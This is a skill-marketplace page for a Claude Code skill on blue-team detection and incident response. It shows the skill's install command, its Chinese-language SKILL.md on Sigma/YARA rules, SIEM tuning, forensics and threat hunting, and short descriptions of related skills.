detecting-and-responding
蓝队与紫队工程:检测规则编写、SIEM/EDR 调优、事件响应、数字取证、威胁狩猎、ATT&CK 映射、紫队演练闭环。Use when writing Sigma/YARA detection rules, tuning SIEM noise, responding to security incidents, conducting forensic analysis, hunting threats, or running purple team exercises.
git clone --depth 1 https://github.com/telagod/code-abyss /tmp/detecting-and-responding && cp -r /tmp/detecting-and-responding/skills/detecting-and-responding ~/.claude/skills/detecting-and-respondingSKILL.md
# 蓝队检测与响应 · 镇魔盾 > 检测是工程,不是运气。每条规则必须能回答四问:**what / why / FP rate / response**。 > 站在防御侧,把告警当代码维护、把事件当事故管理、把狩猎当假设验证。 > 信级:项目日志/EDR 原始事件 > Sigma/YARA 规则库 > ATT&CK 官方矩阵 > 训练记忆(标 `[unverified]`)。 ## 路由 | 意图 | 秘典 | 触发词 | |------|------|--------| | SIEM/EDR 规则与调优 | [siem-and-edr](references/siem-and-edr.md) | Sigma, YARA, Splunk, Elastic, Sentinel, EDR, LOLBins, detection-as-code | | 事件响应与取证 | [incident-response](references/incident-response.md) | IR, NIST 800-61, triage, chain of custody, Volatility, memory, runbook, postmortem | | 威胁狩猎与紫队 | [threat-hunting](references/threat-hunting.md) | hunt, hypothesis, IOC, IOA, TTP, ATT&CK, Atomic Red Team, Caldera, 蜜罐 | ## 执行链 ``` 检测:日志源 → 规则编写 → 告警分级 → 调优降噪 → 覆盖矩阵 响应:识别 → 遏制 → 根因 → 清除 → 恢复 → 复盘 狩猎:假设 → 数据源 → 验证 → 规则化 → 自动化 → 紫队闭环 ``` 每环必须可回答「我看的是哪条日志?我证伪的是哪条假设?我下一步动作是什么?」 ## 何时使用 | 场景 | 用 | 不用 | |------|----|----| | 写 Sigma/YARA 规则、调 SIEM | ✅ siem-and-edr | — | | 处理已发生入侵、取证 | ✅ incident-response | — | | 假设驱动狩猎 / 紫队演练 | ✅ threat-hunting | — | | ATT&CK 检测覆盖打分 | ✅ threat-hunting | — | | 设计应用层防御代码 | ❌ | [defending-applications](../defending-applications/SKILL.md) | | 渗透测试、写 PoC | ❌ | [securing-systems](../securing-systems/SKILL.md) (pentest/red-team) | | 威胁建模、IAM 架构 | ❌ | [architecting-security](../architecting-security/SKILL.md) | | 代码静态扫描胶水 | ❌ | [analyzing-security](../analyzing-security/SKILL.md) | | 云配置基线、K8s 加固 | ❌ | [securing-cloud-and-supply-chain](../securing-cloud-and-supply-chain/SKILL.md) | ## 联动 - **securing-systems/red-team**:攻方 TTP 是本 skill 检测规则的设计输入。 - **securing-systems/threat-intel**:IOC/CTI 投喂本 skill 的规则与狩猎假设。 - **architecting-security/threat-modeling**:威胁模型的 detective control 在本 skill 落地。 - **analyzing-security**:本 skill 产出的 detection-as-code 接入 CI 门禁。 - **automating-devops/observability**:日志/指标/链路三支柱的安全维。 ## 铁律 1. **无噪不出闸** — 任何规则上线前必须有基线 + FP rate 测量;FP > 5% 直接打回调优,不准带病上线。 2. **不证伪即假设** — 狩猎必须有可证伪的假设;找不到不是结论,是数据缺失或假设错。 3. **取证不破坏现场** — 先采易失证据(内存/网络/进程),再动磁盘;写阻断器 + 哈希链 + 时间戳三件套必须齐。 4. **检测即代码** — 规则进 git、有 unit test、过 CI、有 owner;改规则等同改生产代码。 5. **闭环到 ATT&CK** — 每条规则、每次事件、每次狩猎必须映射到 ATT&CK 技术 ID;无 ID 不归档。 ## 输出约束 - 规则示例必须给完整 frontmatter + detection + condition + 反例说明(为什么不这样写)。 - 命令示例标注操作系统与权限要求(root / SYSTEM / 普通用户)。 - 日志样例脱敏:IP 用 `192.0.2.0/24`、域名用 `example.com`、用户名用 `<analyst>`。 - 每条检测规则必须附 FP 来源清单与响应动作(containment / enrichment / kill)。
Analyzes code changes, detects documentation drift, and evaluates change impact scope. Use when reviewing diffs, checking doc sync, or running pre-commit analysis. Automatically triggered after design-level changes or refactoring.
Scans code for security vulnerabilities, detects dangerous patterns, and ensures security decisions are documented. Use when running security scans, auditing code, or checking for OWASP issues, injection risks, or sensitive data leaks. Automatically triggered on new modules, security-related changes, or post-refactor.
Processes Excel spreadsheet files (.xlsx, .xlsm, .csv). Creates workbooks, builds formulas, preserves formatting, analyzes tabular data, and validates financial models with zero-formula-error delivery. Use when working with spreadsheet files or tabular data analysis. Do NOT use for Word documents, PDFs, presentations, or database pipelines.
Frontend UI design system selector and implementation guide covering Glassmorphism, Liquid Glass (Apple-style), Neubrutalism, and Claymorphism. Use when building UI components, choosing a visual aesthetic, implementing design tokens, or auditing accessibility/contrast on themed surfaces. Provides per-style tokens, component patterns, dark mode, and a11y constraints.
安全架构与治理:威胁建模 (STRIDE/PASTA/LINDDUN)、零信任身份架构、IAM/SSO/MFA/PAM、合规框架 (SOC2/PCI/HIPAA/GDPR)、DLP、隐私工程、安全控制设计。Use when designing security architecture, threat modeling new systems, implementing zero-trust identity, designing IAM/SSO/PAM, building compliance evidence chains, or planning privacy-by-design.
DevOps knowledge reference covering Git workflows, testing strategies, DevSecOps, release pipeline orchestration (release.yml, multi-arch images, cosign integration), CI/CD pipelines, database management, observability, and performance optimization. Use when working with Git, CI/CD, release pipelines, ghcr image publishing, testing, monitoring, or infrastructure automation.
AI agent and LLM system engineering reference covering single-agent dev (ReAct, tool calling, plan-execute), multi-agent coordination (swarm, role decomposition, file locking), LLM security (prompt injection, jailbreak defense, output filtering), RAG architecture (chunking, hybrid retrieval, rerank), and prompt engineering / evaluation (RAGAS, LLM-as-Judge). Use when building AI agents, designing RAG pipelines, orchestrating multi-agent workflows, hardening LLM apps, or writing prompts.
Checks code quality metrics including complexity, duplication, naming conventions, and function length. Use when running quality gates, reviewing code smells, or checking lint rules. Automatically triggered on complex modules or post-refactor.